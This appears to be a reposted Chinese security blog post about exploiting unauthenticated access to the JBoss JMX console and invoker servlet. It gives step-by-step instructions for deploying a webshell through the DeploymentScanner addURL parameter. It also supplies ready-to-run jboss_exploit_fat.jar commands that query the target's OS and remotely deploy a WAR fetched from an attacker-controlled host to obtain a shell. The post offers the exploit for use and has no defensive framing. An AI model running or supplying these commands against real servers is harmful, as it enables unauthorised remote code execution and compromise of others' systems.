码迷,mamicode.com
首页 > Web开发 > 详细

WEB中间件--Jboss未授权访问,

时间:2018-04-26 14:05:19      阅读:556      评论:0      收藏:0      [点我收藏+]

标签:info   图片   参数   web服务   type   获得   url   控制   spec   

1,Jboss未授权访问部署木马

发现存在Jboss默认页面,点进控制页
技术分享图片
点击 Jboss.deployment 进入应用部署页面
也可以直接输入此URL进入

http://www.ctfswiki.com:8080//jmxconsole/HtmlAdaptoraction=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL

技术分享图片
搭建远程木马服务器,可以用apache等web服务器来搭建,通过addurl参数进行木马的远程部署
技术分享图片
部署成功,访问木马地址
技术分享图片
最后附上一个jboss未授权访问EXP,备用,使用说明

1. 查看系统名称

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName

2. 查看系统版本

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion


3.远程部署war

java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war

获得shell地址:
www.any.com:8080/no/index.jsp

技术分享图片

WEB中间件--Jboss未授权访问,

标签:info   图片   参数   web服务   type   获得   url   控制   spec   

原文地址:https://www.cnblogs.com/hackxf/p/8951699.html

(0)
(1)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!